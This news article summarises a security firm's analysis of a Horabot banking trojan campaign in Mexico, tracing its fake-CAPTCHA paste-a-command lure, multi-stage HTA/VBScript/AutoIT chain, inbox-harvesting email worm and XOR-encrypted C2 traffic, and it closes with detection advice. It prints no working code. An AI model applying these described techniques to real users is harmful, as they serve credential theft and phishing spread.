Horabot Banking Trojan Resurfaces in Mexico With Multi-Stage Phishing and Email Worm Tactics

Home Cyber Security News Horabot Banking Trojan Resurfaces in Mexico With Multi-Stage Phishing and Email Worm... A well-known banking trojan called Horabot has resurfaced in an active campaign targeting users across Mexico, combining a multi-stage infection chain with an email worm that turns every compromised machine into a phishing relay. The threat bundles a Delphi-based banking trojan with a PowerShell-driven spreader, making it one of the more layered financially motivated threats seen in Latin America.​ The attack begins with a fake CAPTCHA page that instructs victims to open the Windows Run dialog and paste a malicious command. Rather than exploiting a software flaw, attackers trick users into executing a malicious HTA file that silently launches the infection chain. This method sidesteps many endpoint defenses by turning the victim into an unknowing participant in their own compromise.​ Securelist analysts identified this campaign after a suspicious mshta execution alert triggered within a monitored customer environment. The team traced the activity to a fake CAPTCHA page and mapped the full attack chain by probing the adversary’s infrastructure. Fake CAPTCHA page (Source – Securelist) During that process, researchers found an exposed victim log on the attacker’s own server, revealing 5,384 infected machines — 5,030, or roughly 93%, located in Mexico. Records stretched back to May 2025, confirming the operation had been running for months before detection.​ The threat actors show clear ties to Brazil. Comments inside the spreader’s PowerShell code were written in casual Brazilian Portuguese, and the encryption key used for resource decryption references the phrase “pega a visão,” meaning “get the picture” in Brazilian slang. The phishing emails distributed by the worm are written in Spanish and crafted as fake invoices or confidential business documents targeting Mexican recipients.​ The Delphi banking trojan — also tracked as Casbaneiro, Ponteiro, and Metamorfo — uses fake bank overlay pop-ups to steal login credentials during active banking sessions. The email worm also harvests contact addresses from the victim’s inbox through the MAPI namespace and sends phishing emails to each one, carrying a malicious PDF that restarts the entire infection cycle.​ Multi-Stage Infection Mechanism What sets this campaign apart is not just its payload, but the elaborate delivery route. Each stage introduces a fresh layer of obfuscation before the final malware arrives. After the HTA file executes, it fetches a JavaScript loader from an attacker-controlled domain, which then pulls and runs an obfuscated VBScript. This VBScript uses server-side polymorphism — delivering a slightly different version of the code on every request to defeat signature-based detection. A second, more complex VBScript of over 400 lines acts as the operation’s workhorse, collecting the victim’s IP address, hostname, username, and OS version before sending that data to a command-and-control server. It drops AutoIT components to disk, plants a LNK shortcut in the Startup folder for persistence, and downloads the next stage. The AutoIT script then decrypts an AES-192-encrypted blob using a key derived from the seed value 99521487 and loads the resulting DLL directly into memory — that DLL is the banking trojan. It communicates with its C2 server over a custom TCP protocol, wrapping commands in structured tags, with all traffic encrypted through a stateful XOR cipher. The output is framed between double "##" markers, a pattern rare enough in legitimate traffic to work as a reliable network detection signature. C2 socket address extraction (Source – Securelist) Analysts noted that the cipher’s rigid, repetitive structure actually makes it easier to catch with a standard IDS rule.​ Security teams should block HTA file execution from untrusted sources and monitor closely for suspicious mshta activity. Deploying the published YARA rules for both the Horabot Delphi trojan and AutoIT loader, together with the Suricata rule targeting the double "##" C2 traffic pattern, will help detect infections early. All shared indicators of compromise — including the attacker-controlled domains and socket addresses — should be added to network blocklists without delay. User awareness training on fake CAPTCHA lures and PDF attachments with embedded buttons remains a critical defense layer. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. RELATED ARTICLESMORE FROM AUTHOR Cyber Security Critical Ubiquiti UniFi Vulnerabilities Allow Attackers to Seize Full Control of Underlying Systems Cyber Security News ‘Vibe-Coded’ Malware Campaign Uses Fake Tools, CDNs and File Hosts to Infect Users Cyber Security News Malicious ‘Pyronut’ Package Backdoors Telegram Bots With Remote Code Execution Top 10 Essential E-Signature Solutions for Cybersecurity in 2026 January 31, 2026 Top 10 Best Data Removal Services In 2026 January 29, 2026 Best VPN Services of 2026: Fast, Secure & Affordable January 26, 2026 Top 10 Best Data Security Companies in 2026 January 23, 2026 Top 15 Best Ethical Hacking Tools – 2026 January 15, 2026